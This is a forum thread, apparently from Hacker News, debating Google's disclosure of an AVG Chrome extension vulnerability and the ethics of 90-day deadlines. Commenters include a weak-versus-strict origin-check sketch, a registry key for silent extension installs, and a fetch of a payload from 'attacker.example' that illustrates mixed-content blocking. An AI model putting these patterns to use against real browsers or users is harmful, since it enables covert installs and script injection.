
If I had to guess: because at this point it's obvious that they have no idea what they're doing and will struggle not just to fix it, but to maintain the level of quality needed to keep it fixed.



Then tell AVG that. I've seen plenty of bugs where the original fix didn't fix everything, the reporter explained why, and then they waited for another response. Here they didn't even honor the 90-day deadline.


> I've seen plenty of bugs where the original fix didn't fix everything

You're right, but plenty of bugs aren't in a browser extension that is supposed to enhance the user's security while browsing the internet. The initial fix appeared to show a complete lack of understanding of basic web security.

If you and an intelligent coworker have an agreement to review each other's code on commit, and that coworker responds to a valid complaint about their code with something apparently lifted from the first StackOverflow post that addresses the literal wording of the complaint without actually solving the problem, you'd probably be a bit peeved that they're not doing their job (see the sketch below for the kind of "fix" I mean). Here, the Chrome developers are just showing frustration at AVG's apparent lack of basic skill.
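
To make that concrete: I don't know what AVG's actual patch looked like, but the archetype of this kind of non-fix is an origin check done by substring matching. A rough sketch, hypothetical code only:

  // Hypothetical sketch, not AVG's actual code: the kind of "fix" that
  // addresses the literal complaint ("restrict which sites can call this
  // API") without solving the problem.
  function isTrustedNaive(origin: string): boolean {
    // Looks plausible, but "https://avg.com.attacker.example" and
    // "https://notavg.com" both pass this check.
    return origin.indexOf("avg.com") !== -1;
  }

  // What a minimally competent fix looks like: parse the origin and
  // compare the host exactly against an explicit HTTPS-only whitelist.
  const TRUSTED_HOSTS = new Set(["www.avg.com"]); // placeholder whitelist

  function isTrusted(origin: string): boolean {
    try {
      const url = new URL(origin);
      return url.protocol === "https:" && TRUSTED_HOSTS.has(url.hostname);
    } catch {
      return false;
    }
  }

And even the exact-match version only helps if the whitelisted pages themselves are free of XSS, which is presumably part of why the report bothered to point at an XSS on AVG's site at all.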


Frustration is fine. I'd even be fine if they banned AVG. But revealing a 0-day publicly without giving time to respond is worse, and it's also not in line with Google's policies as I understand them.

Many security bugs are for things that one might think are basic after hearing about them, but that shouldn't make it right to 0-day them.

Edit: why would revealing a vulnerability to the world before it's been fixed be the right response to incompetence on the part of the vendor?


Regardless of policy, it was the right thing to do.


Do you think 0-days should be reported as soon as they're found if the vendor is incompetent? If yes, what's the argument? If not, why is this case different?


When you find critical vulnerabilities in popular antivirus software, you can establish a 90-day publishing schedule, or a requirement not to publish until all related vulnerabilities are fixed, or whatever other policy you deem sensible.

Tavis Ormandy is one of the best known vulnerability researchers in the world; whatever publishing decision he and his team made, I think they probably put more thought into it than any combination of the comments on this HN thread did.


It sounds like you're saying he's above criticism for some reason related to fame? That doesn't make sense to me.

If there are details I don't know about that explain it, fine (though it doesn't look that way from what I can see), but arguments over ethics shouldn't be won by appeals to authority.

I might place more stock in your point here if he'd actually given a reason, acknowledged that he's opening users up to exploits, and said it's worth it because of X. As it is, it doesn't look thought out at all.


I'm suggesting that the implication you're generating all over this thread that (a) there are hard-and-fast rules for disclosure and (b) Tavis Ormandy has somehow broken them is probably built on something other than firsthand knowledge of how vulnerability research works --- to say nothing of firsthand knowledge of how this particular vulnerability was handled.


Google does have a policy of not disclosing within 90 days unless a patch has been released, and this does seem to point out a vulnerability that hasn't been patched. What am I misunderstanding?

Separately, even if they had no such policy, or it were an independent researcher, I don't think discussing the ethics of disclosure should be off limits for someone not directly involved.


If the vendor is incompetent and the bug is being actively exploited, then it's reasonable to violate the 90-day policy, which is designed in the spirit of cooperation with competent vendors.

Six months ago they decided to limit inline installations [1], and they probably started reviewing poorly rated add-ons like this one at that time.

[1] http://blog.chromium.org/2015/08/protecting-users-from-decep...


There's no indication that the bug was being actively exploited.

Anyway, it's not clear what benefit there was over releasing the report without the XSS link. They could even have said "there's an XSS on your site" without mentioning the exact link.

Again, they should ban the extension completely if they think it's insecure, and if they haven't done that, they shouldn't be publicizing exploits.


Tavis Ormandy started tweeting at AVG about this subject several months ago.

And it's been pointed out that they aren't able to remove the extension from users' machines due to how it bypasses the Chrome security system. So their best bet was to ask AVG to do the right thing. AVG won't or can't.

So, what can Google do? Just silently accept it? The 90-day policy is worthless in this case.
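
For anyone wondering how an extension ends up outside Google's reach in the first place: I don't know exactly which route AVG's installer took, but Chrome has long supported "external" installation on Windows, where a native installer drops a registry key and the browser picks the extension up on next launch, outside the normal Web Store install flow. Something along these lines (placeholder ID and URL, not AVG's):

  Windows Registry Editor Version 5.00

  ; Placeholder example of an externally installed extension; the
  ; 32-character ID and the update URL are made up.
  [HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions\aaaabbbbccccddddeeeeffffgggghhhh]
  "update_url"="https://vendor.example/updates.xml"

Whether that's the exact mechanism here I can't say, but it's a common way security suites have bundled their browser extensions.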


I went back through his tweets to 2014 and searched for AVG: I found nothing before October, and that tweet wasn't a request for contact; the request for contact came in December.

The report is dated this month.

Re removing it: they can remove it from the webstore. As long as it's in the webstore, they shouldn't be releasing 0-days that haven't been patched yet.


You expended a lot of effort on what could have been easily resolved by asking me. The XSS that you're concerned about was for illustrative purposes only, and could not be used in an attack due to mixed-content errors.

I don't really want to discuss disclosure ethics with you, but will say that our documented policy was followed to the letter.
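
(For readers unfamiliar with the mixed-content point: a page served over HTTPS refuses to load active content, such as scripts or XHR/fetch, over plain HTTP, so an exploit chain that depends on such a load simply dies in the console. A minimal illustration, with made-up URLs:)

  // Minimal illustration with made-up URLs. Run this from a page served
  // over https://: the browser blocks active content fetched over plain
  // http:// as mixed content, so the payload never loads.
  fetch("http://attacker.example/payload.js")
    .then(r => r.text())
    .then(js => console.log("loaded", js.length, "bytes")) // never reached
    .catch(err => console.error("blocked as mixed content:", err));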


Yes. 90-day windows are for us, the users, not for companies/projects/teams. They are an acknowledgement that the producer of the software is best suited to patch and get that update to users. If they aren't suited to the task, notifying users that they are at risk is the right thing to do.


Out of the following two outcomes:

1. Tell the company; maybe it takes another week to get it fully fixed.

2. Tell users, most of whom will never hear about it, while hackers will.

The first still seems better. As long as Google isn't pulling the extension and uninstalling it from all Chrome users' machines, it seems like disclosure is only hurting most users.


That is a perfectly respectable and intellectually coherent rationale for not disclosing bugs you find prior to the availability of their patches.

However, on the off chance that you are somehow (despite it being 2015) new to the Great Disclosure Debate, you should be aware that there are other respectable and intellectually coherent rationales for other disclosure schedules, and that you are vanishingly unlikely to be the Internet Message Board Commenter That The Prophets Foretold Would Resolve The Disclosure Debate.

So while it's one thing to use this incident to give voice to your own reasoning about how disclosure should be handled, it's another thing entirely to moralize about it --- in this case, repetitively --- with a tone suggesting that the debate has somehow been settled, and you've somehow found out about that before the rest of us.

Your opinions about vulnerability research also get a lot more interesting if you can tell us about your own VR/xdev experience. Because, like it or not, and I know from your comments thus far that you do not like this, if Tavis Ormandy said "new rule: you can disclose 15 seconds after discovery, patch or no patch, so long as you yourself are wearing a pirate eye patch with a large googly eye glued to it", a pretty big swath of the security research community would accept that as The New Rule.


Um, I'm not considering it settled.

I think this violates Google's stated policy, or at least I'd like an explanation of why it doesn't. I think that publicizing against your own policy may be worse than publicizing independently.

Is your only problem my tone? And do you think the point about Google's policy is entirely moot, and if so, why?

Re disclosure debate: In this specific instance it seems like it either would have been fixed relatively soon with an audit, or it would not have been fixed and Google would need to remove it from their store. Given that the person making the choice to publicize also has the power to "patch" it by getting Google to ban the extension, the specific choice they made doesn't make sense to me. Either publicize and leave out the unfixed detail, or ban it, then publicize.

As a Chrome user, I have the right to be annoyed that Google would disclose an issue with an extension on their store without either giving enough time to fix it or banning the extension. That makes it different from other instances of disclosure, and to my mind shifts the balance closer to not disclosing.


I think you should take this to @thegrugq on Twitter. He's like Judge Wapner for stuff like this. He'll know what to do.


Regarding tone: several of my "shoulds" were implicitly "if they follow their own policy, then they should". If that wasn't clear, then my comments may have sounded more confident than warranted, although even that implication still seems like a valid position to take.

Edit: my argument that this hurts users also presumes that full disclosure hurts users, which is what Google believes; that's why they have the 90-day policy.


If they manage to keep XSS vulnerabilities off the pages on their domain(s) for longer than a year, I'll be very surprised.

Personally speaking, I'd rather know. If it's a piece of security software, it's reasonable to assume the bad guys are already looking at it or using it.



